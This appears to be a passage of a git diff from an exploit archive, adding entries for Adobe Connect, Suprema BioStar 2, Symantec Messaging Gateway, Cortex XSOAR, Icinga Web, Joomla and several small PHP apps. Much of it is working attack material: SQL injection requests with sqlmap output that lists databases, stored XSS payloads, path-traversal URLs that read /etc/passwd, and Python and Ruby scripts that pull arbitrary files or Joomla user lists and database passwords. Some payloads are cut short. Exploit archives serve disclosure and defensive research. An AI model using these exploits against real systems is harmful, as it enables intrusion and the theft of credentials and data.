+[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399) + +## Proof and Exploit: +[href](https://streamable.com/dnyfx0) + +## Time spend: +03:00:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/multiple/webapps/51327.txt b/exploits/multiple/webapps/51327.txt new file mode 100644 index 000000000..21509bc57 --- /dev/null +++ b/exploits/multiple/webapps/51327.txt @@ -0,0 +1,41 @@ +# Title: Adobe Connect 11.4.5 - Local File Disclosure +# Author: h4shur +# date:2021.01.16-2023.02.17 +# CVE: CVE-2023-22232 +# Vendor Homepage: https://www.adobe.com +# Software Link: https://www.adobe.com/products/adobeconnect.html +# Version: 11.4.5 and earlier, 12.1.5 and earlier +# User interaction: None +# Tested on: Windows 10 & Google Chrome, kali linux & firefox + +### Summary: +Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. +Exploitation of this issue does not require user interaction. + +### Description : +There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team. +* What is LFD bug? +LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug +* Intruder access level with LFD bug +The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access +* Identify vulnerable sites +To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file +* And this time the "lfd" in "adobe connect" bug: +To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable. +You can download the file by writing the file path and file name and extension. +When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer +file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file. +* There are values inside the url that do not allow a file other than this file to be downloaded. +* Values: sco_id and tickets +But if these values are cleared, you will see that reloading is possible without any obstacles +At another address, you can download multiple files as a zip file. +We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension. + +### POC : +https://target.com/[folder]/download?download-url=[URL]&name=[file.type] +https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder] + +### References: +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232 +https://nvd.nist.gov/vuln/detail/CVE-2023-22232 +https://helpx.adobe.com/security/products/connect/apsb23-05.html \ No newline at end of file diff --git a/exploits/multiple/webapps/51340.txt b/exploits/multiple/webapps/51340.txt new file mode 100644 index 000000000..0aa7d0463 --- /dev/null +++ b/exploits/multiple/webapps/51340.txt @@ -0,0 +1,97 @@ +# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection +# Date: 26/03/2023 +# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/) +# Vendor Homepage: https://www.supremainc.com/ +# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp +# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide +# Version: 2.8.16 +# Tested on: Windows, Linux +# CVE-2023-27167 + +## Description +A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter. + +## Request PoC #1 +''' +POST /api/users/absence?search_month=1 HTTP/1.1 +Host: biostar2.server.net +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0 +Accept: application/json, text/plain, */* +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +content-type: application/json;charset=UTF-8 +content-language: en +bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548 +Content-Length: 204 +Origin: https://biostar2.server.net +Connection: close +Referer: https://biostar2.server.net/ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}} + +''' + +Time based SQL injection (set 4 – response delays for 8 seconds). + +''' + +## Request PoC #2 +''' +POST /api/users/absence?search_month=1 HTTP/1.1 +Host: biostar2.server.net +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0 +Accept: application/json, text/plain, */* +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +content-type: application/json;charset=UTF-8 +content-language: en +bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548 +Content-Length: 188 +Origin: https://biostar2.server.net +Connection: close +Referer: https://biostar2.server.net/ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}} + +''' + +Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin) + +''' + +## Exploit with SQLmap + +Save the request from Burp Suite to file. + +''' +--- +Parameter: JSON #1* ((custom) POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}} + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}} +--- +[05:02:49] [INFO] testing MySQL +[05:02:49] [INFO] confirming MySQL +[05:02:50] [INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL > 5.0.0 (MariaDB fork) +[05:02:50] [INFO] fetching database names +[05:02:50] [INFO] fetching number of databases +[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval +[05:02:55] [INFO] retrieved: 2 +[05:03:12] [INFO] retrieved: biostar2_ac +[05:03:56] [INFO] retrieved: information_schema +available databases [2]: +[*] biostar2_ac +[*] information schema + +''' \ No newline at end of file diff --git a/exploits/multiple/webapps/51342.txt b/exploits/multiple/webapps/51342.txt new file mode 100644 index 000000000..5a441247e --- /dev/null +++ b/exploits/multiple/webapps/51342.txt @@ -0,0 +1,46 @@ +# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS) +# Exploit Author: omurugur +# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117 +# Version: 10.7.4-10.7.13 +# Tested on: [relevant os] +# CVE : CVE-2022-25630 +# Author Web: https://www.justsecnow.com +# Author Social: @omurugurrr + + +An authenticated user can embed malicious content with XSS into the admin +group policy page. + +Example payload + +*"/>* + + +POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo +HTTP/1.1 +Host: X.X.X.X +Cookie: JSESSIONID=xxxxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) +Gecko/20100101 Firefox/99.0 +Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 652 +Origin: https://x.x.x.x +Referer: +https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000 + + +Regards, + +Omur UGUR \ No newline at end of file diff --git a/exploits/multiple/webapps/51343.txt b/exploits/multiple/webapps/51343.txt new file mode 100644 index 000000000..c503a5f23 --- /dev/null +++ b/exploits/multiple/webapps/51343.txt @@ -0,0 +1,44 @@ +# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) +# Exploit Author: omurugur +# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020 +# Version: 6.5.0 - 6.2.0 - 6.1.0 +# Tested on: [relevant os] +# CVE : CVE-2022-0020 +# Author Web: https://www.justsecnow.com +# Author Social: @omurugurrr + + +A stored cross-site scripting (XSS) vulnerability in Palo Alto Network +Cortex XSOAR web interface enables an authenticated network-based attacker +to store a persistent javascript payload that will perform arbitrary +actions in the Cortex XSOAR web interface on behalf of authenticated +administrators who encounter the payload during normal operations. + +POST /acc_UAB(MAY)/incidentfield HTTP/1.1 +Host: x.x.x.x +Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x; +isTimLicense=false +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) +Gecko/20100101 Firefox/94.0 +Accept: application/json +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://x.x.x.x/acc_UAB(MAY) +Content-Type: application/json +X-Xsrf-Token: +Api_truncate_results: true +Origin: https://x.x.x.x +Content-Length: 373 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers +Connection: close +{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/>","editForm":true,"commitMessage":"Field +edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/>","group":0,"required":false} + +Regards, + +Omur UGUR + +> \ No newline at end of file diff --git a/exploits/php/webapps/51231.txt b/exploits/php/webapps/51231.txt deleted file mode 100644 index 5113b0b50..000000000 --- a/exploits/php/webapps/51231.txt +++ /dev/null @@ -1,32 +0,0 @@ -# Exploit Title: GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure -# Date: 11 Jun 2022 -# Version: >=10.0.0 and < 10.0.2 -# Author: Nuri Çilengir -# Vendor Homepage: https://glpi-project.org/ -# Software Link: https://github.com/glpi-project/glpi -# Advisory: -https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ -# Tested on: Ubuntu 22.04 -# CVE: CVE-2022-31068 - --- -*Nuri Çilengir* -/Cyber Security Consultant/ - -*PRODAFT SARL* -*CH:* Y-Parc, rue Galilée 7, 1400 Yverdon-les-Bains -*TR:* Sanayi Mah. Teknopark Istanbul 5. Blok K2 Pendik, Istanbul -*NL:* HSD Campus Wilhelmina van Pruisenweg 104, 2595 AN, Den Haag -GSM: (+90) 553 444 7080 -E.:nuri[at]prodaft[dot]com -IN:/cilengirnuri - - - -/* In case you think you’re not the designated recipient of the e-mail -hereby; please delete it accordingly./ -/** This e-mail may have been sent from a mobile device. Please contact -me from my mobile, in case you notice an error in the content./ -/PS. Feel free to contact me via Signal, Threema or Telegram; or ask for -my public PGP key for high-profile cases that may require higher -confidentiality./ \ No newline at end of file diff --git a/exploits/php/webapps/51329.py b/exploits/php/webapps/51329.py new file mode 100755 index 000000000..72d78b505 --- /dev/null +++ b/exploits/php/webapps/51329.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python3 + +# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure +# Date: 2023-03-19 +# Exploit Author: Jacob Ebben +# Vendor Homepage: https://icinga.com/ +# Software Link: https://github.com/Icinga/icingaweb2 +# Version: <2.8.6, <2.9.6, <2.10 +# Tested on: Icinga Web 2 Version 2.9.2 on Linux +# CVE: CVE-2022-24716 +# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/ + +import argparse +import requests +from termcolor import colored + +def print_message(message, type): + if type == 'SUCCESS': + print('[' + colored('SUCCESS', 'green') + '] ' + message) + elif type == 'INFO': + print('[' + colored('INFO', 'blue') + '] ' + message) + elif type == 'WARNING': + print('[' + colored('WARNING', 'yellow') + '] ' + message) + elif type == 'ALERT': + print('[' + colored('ALERT', 'yellow') + '] ' + message) + elif type == 'ERROR': + print('[' + colored('ERROR', 'red') + '] ' + message) + +def get_normalized_url(url): + if url[-1] != '/': + url += '/' + if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://': + url = "http://" + url + return url + +def get_proxy_protocol(url): + if url[0:8].lower() == 'https://': + return 'https' + return 'http' + +parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10') +parser.add_argument('TARGET', type=str, + help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)') +parser.add_argument('FILE', type=str, + help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")') +parser.add_argument('-P','--proxy', type=str, + help='HTTP proxy address (Example: http://127.0.0.1:8080/)') +args = parser.parse_args() + +if args.proxy: + proxy_url = get_normalized_url(args.proxy) + proxy_protocol = get_proxy_protocol(proxy_url) + proxies = { proxy_protocol: proxy_url } +else: + proxies = {} + +base_url = get_normalized_url(args.TARGET) +exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE + +request = requests.get(base_url, proxies=proxies) +if request.status_code == 404: + print_message("Could not connect to provided URL!", "ERROR") + exit() + +request = requests.get(exploit_url, proxies=proxies) +file_content = request.text + +print(file_content) \ No newline at end of file diff --git a/exploits/php/webapps/51330.txt b/exploits/php/webapps/51330.txt new file mode 100644 index 000000000..32d8a7abb --- /dev/null +++ b/exploits/php/webapps/51330.txt @@ -0,0 +1,17 @@ +# Exploit Title: Restaurant Management System 1.0 - SQL Injection +# Date: 2023-03-20 +# Exploit Author: calfcrusher (calfcrusher@inventati.org) +# Vendor Homepage: https://www.sourcecodester.com/users/lewa +# Software Link: +https://www.sourcecodester.com/php/11815/restaurant-management-system.html +# Version: 1.0 +# Tested on: Apache 2.4.6, PHP 5.4.16 + +Endpoint: /rms/delete-order.php + +Vulnerable parameter: id (GET) + +Time Base SQL Injection payloads + +http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23 +http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)-- \ No newline at end of file diff --git a/exploits/php/webapps/51334.py b/exploits/php/webapps/51334.py new file mode 100755 index 000000000..a390f9503 --- /dev/null +++ b/exploits/php/webapps/51334.py @@ -0,0 +1,132 @@ +#!/usr/bin/env ruby + +# Exploit +## Title: Joomla! v4.2.8 - Unauthenticated information disclosure +## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr) +## Author website: https://pwn.by/noraj/ +## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752 +## Date: 2023-03-24 +## Vendor Homepage: https://www.joomla.org/ +## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz +## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7) +## Tested on: Joomla! Version 4.2.7 +## CVE : CVE-2023-23752 +## References: +## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/ +## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html +## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752 +## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752 +## - https://vulncheck.com/blog/joomla-for-rce +## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml + +# standard library +require 'json' +# gems +require 'httpx' +require 'docopt' +require 'paint' + +doc = <<~DOCOPT + #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]} + + #{Paint['Usage:', :red]} + #{__FILE__} [options] + #{__FILE__} -h | --help + + #{Paint['Parameters:', :red]} + Root URL (base path) including HTTP scheme, port and root folder + + #{Paint['Options:', :red]} + --debug Display arguments + --no-color Disable colorized output (NO_COLOR environment variable is respected too) + -h, --help Show this screen + + #{Paint['Examples:', :red]} + #{__FILE__} http://127.0.0.1:4242 + #{__FILE__} https://example.org/subdir + + #{Paint['Project:', :red]} + #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec) + #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis) + #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752) +DOCOPT + +def fetch_users(root_url, http) + vuln_url = "#{root_url}/api/index.php/v1/users?public=true" + http.get(vuln_url) +end + +def parse_users(root_url, http) + data_json = fetch_users(root_url, http) + data = JSON.parse(data_json)['data'] + users = [] + data.each do |user| + if user['type'] == 'users' + id = user['attributes']['id'] + name = user['attributes']['name'] + username = user['attributes']['username'] + email = user['attributes']['email'] + groups = user['attributes']['group_names'] + users << {id: id, name: name, username: username, email: email, groups: groups} + end + end + users +end + +def display_users(root_url, http) + users = parse_users(root_url, http) + puts Paint['Users', :red, :bold] + users.each do |u| + puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}" + end +end + +def fetch_config(root_url, http) + vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true" + http.get(vuln_url) +end + +def parse_config(root_url, http) + data_json = fetch_config(root_url, http) + data = JSON.parse(data_json)['data'] + config = {} + data.each do |entry| + if entry['type'] == 'application' + key = entry['attributes'].keys.first + config[key] = entry['attributes'][key] + end + end + config +end + +def display_config(root_url, http) + c = parse_config(root_url, http) + puts Paint['Site info', :red, :bold] + puts "Site name: #{c['sitename']}" + puts "Editor: #{c['editor']}" + puts "Captcha: #{c['captcha']}" + puts "Access: #{c['access']}" + puts "Debug status: #{c['debug']}" + puts + puts Paint['Database info', :red, :bold] + puts "DB type: #{c['dbtype']}" + puts "DB host: #{c['host']}" + puts "DB user: #{Paint[c['user'], :yellow, :bold]}" + puts "DB password: #{Paint[c['password'], :yellow, :bold]}" + puts "DB name: #{c['db']}" + puts "DB prefix: #{c['dbprefix']}" + puts "DB encryption #{c['dbencryption']}" +end + +begin + args = Docopt.docopt(doc) + Paint.mode = 0 if args['--no-color'] + puts args if args['--debug'] + + http = HTTPX + display_users(args[''], http) + puts + display_config(args[''], http) +rescue Docopt::Exit => e + puts e.message +end \ No newline at end of file diff --git a/exploits/php/webapps/51337.txt b/exploits/php/webapps/51337.txt new file mode 100644 index 000000000..c674c00b9 --- /dev/null +++ b/exploits/php/webapps/51337.txt @@ -0,0 +1,40 @@ +# Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS) +# Date: 25/02/2023 +# Exploit Author: Sanjay Singh +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html +# Tested on: Windows + +use payload="> + +1. visit-http://localhost/doctor/applicationlayer/Doctorpatient.php + +2. login Doctor account with default credential + +3. Click left side add description + +4. capture request and put payload + +http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E + + + +request + +GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1 +Host: localhost +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/51338.txt b/exploits/php/webapps/51338.txt new file mode 100644 index 000000000..68ff6b4be --- /dev/null +++ b/exploits/php/webapps/51338.txt @@ -0,0 +1,126 @@ +# Exploit Title: Medicine Tracker System v1.0 - Sql Injection +# Exploit Author: Sanjay Singh +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: +https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip +# Version: V1.0.0 +# Tested on: Windows/Linux + + +# Proof of Concept: +# 1- http://localhost/php-mts/app/login.php +# 2- login with default credential +# 3- Click left side Manage account and fill Update User Details and click update account +# 4- Capture request using burp suite +# 5- Save request request.txt + + +Sqlmap + +POST /php-mts/classes/Users.php?f=save_user HTTP/1.1 +Host: localhost +Content-Length: 661 +sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/php-mts/app/?page=manage_account +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql +Connection: close + +------WebKitFormBoundaryeOo3CzyRX6fHexZx +Content-Disposition: form-data; name="id" + +1'-' +------WebKitFormBoundaryeOo3CzyRX6fHexZx +Content-Disposition: form-data; name="firstname" + +gogo +------WebKitFormBoundaryeOo3CzyRX6fHexZx +Content-Disposition: form-data; name="middlename" + +ogo +------WebKitFormBoundaryeOo3CzyRX6fHexZx +Content-Disposition: form-data; name="lastname" + +singh +------WebKitFormBoundaryeOo3CzyRX6fHexZx +Content-Disposition: form-data; name="username" + +mayuri.infospace@gmail.com +------WebKitFormBoundaryeOo3CzyRX6fHexZx +Content-Disposition: form-data; name="password" + +12345678 +------WebKitFormBoundaryeOo3CzyRX6fHexZx-- + + + + + +sqlmap + +sqlmap -r request.txt -p "id" --dbs --batch + ___ + __H__ + ___ ___["]_____ ___ ___ {1.6.12#stable} +|_ -| . ['] | .'| . | +|___|_ [(]_|_|_|__,| _| + |_|V... |_| https://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + +[*] starting @ 13:18:01 /2023-03-21/ + +[13:18:01] [INFO] parsing HTTP request from 'request.txt' +it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N +[13:18:01] [INFO] resuming back-end DBMS 'mysql' +[13:18:01] [INFO] testing connection to the target URL +[13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: id (POST) + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss +--- +[13:18:01] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.54, PHP 8.0.25 +back-end DBMS: MySQL >= 5.0 (MariaDB fork) +[13:18:01] [INFO] fetching database names +[13:18:01] [INFO] resumed: 'information_schema' +[13:18:01] [INFO] resumed: 'art_gallery' +[13:18:01] [INFO] resumed: 'hcpms' +[13:18:01] [INFO] resumed: 'mts_db' +[13:18:01] [INFO] resumed: 'mysql' +[13:18:01] [INFO] resumed: 'performance_schema' +[13:18:01] [INFO] resumed: 'phpmyadmin' +[13:18:01] [INFO] resumed: 'sscdms_db' +[13:18:01] [INFO] resumed: 'test' +available databases [9]: +[*] art_gallery +[*] hcpms +[*] information_schema +[*] mts_db +[*] mysql +[*] performance_schema +[*] phpmyadmin +[*] sscdms_db +[*] test + +[13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2' + +[*] ending @ 13:18:01 /2023-03-21/ \ No newline at end of file diff --git a/exploits/php/webapps/51344.txt b/exploits/php/webapps/51344.txt new file mode 100644 index 000000000..e9d2ac9c5 --- /dev/null +++ b/exploits/php/webapps/51344.txt @@ -0,0 +1,57 @@ +## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE) +## Author: nu11secur1ty +## Date: 03.30.2023 +## Vendor: https://github.com/oretnom23 +## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html +## Reference: https://portswigger.net/web-security/file-upload + +## Description: +The malicious user can request an account from the administrator of +this system. +Then he can use this vulnerability to destroy or get access to all +accounts of this system, even more, worst than ever. +The malicious user can upload a very dangerous file on this server, +and he can execute it via shell, +this is because he can access the upload function from the +administrator account. +The status is CRITICAL. + +STATUS: HIGH Vulnerability + +[+]Exploit: +```mysql + + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0) + +## Proof and Exploit: +[href](https://streamable.com/szb9qy) + +## Time spend: +00:45:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51345.txt b/exploits/php/webapps/51345.txt new file mode 100644 index 000000000..f47af7157 --- /dev/null +++ b/exploits/php/webapps/51345.txt @@ -0,0 +1,46 @@ +# Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) +# Exploit Author: Betul Denizler +# Vendor Homepage: https://x2crm.com/ +# Software Link: https://sourceforge.net/projects/x2engine/ +# Version: X2CRM v6.6/6.9 +# Tested on: Ubuntu Mate 20.04 +# Vulnerable Parameter: Actions[subject] +# CVE: CVE-2022-48178 +# Date: 27.12.2022 + +''' +POC REQUEST: +======== +POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) +Gecko/20100101 Firefox/108.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 172 +Origin: http://localhost +Connection: close +Referer: +http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1 +Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; +PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; +YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; +5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; +d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; 